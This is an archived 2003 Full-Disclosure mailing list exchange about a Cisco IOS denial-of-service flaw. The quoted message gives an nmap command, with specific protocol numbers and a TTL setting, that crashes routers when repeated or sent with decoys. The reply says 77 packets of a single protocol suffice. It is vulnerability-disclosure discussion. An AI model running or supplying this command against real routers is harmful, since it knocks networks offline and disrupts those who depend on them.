lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [day] [month] [year] [list]
From: amilabs at optonline.net (amilabs)
Subject: Re: Cisco IOS Denial of Service  that affects
 most Cisco IOS routers- requires power cycle to recover

Cool, but as per my post earlier you can accomplish the same with any
ONE of the protocols. The exploit does not require the use of all four.
You can send 77 packets of 53 and that will do it.

Regards..
AMILABS
-----Original Message-----
From: full-disclosure-admin@...ts.netsys.com
[mailto:full-disclosure-admin@...ts.netsys.com] On Behalf Of Shawn
Bernard
Sent: Tuesday, July 22, 2003 4:34 PM
To: full-disclosure@...ts.netsys.com
Subject: [Full-Disclosure] Re: Cisco IOS Denial of Service that affects
most Cisco IOS routers- requires power cycle to recover


Yet another tool that can be used to croak a router is trusty Nmap-

 nmap -sO -p 53,55,77,103 -v -ttl [ttl from ping -255] [targetIP]
 
when run ~13 times or with a few decoys ;-) will fill the imput queue
requiring a router reboot


____________________________________________________________
Free 20MB Web Site Hosting and Personalized E-mail Service!
Get It Now At Doteasy.com http://www.doteasy.com/et/
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ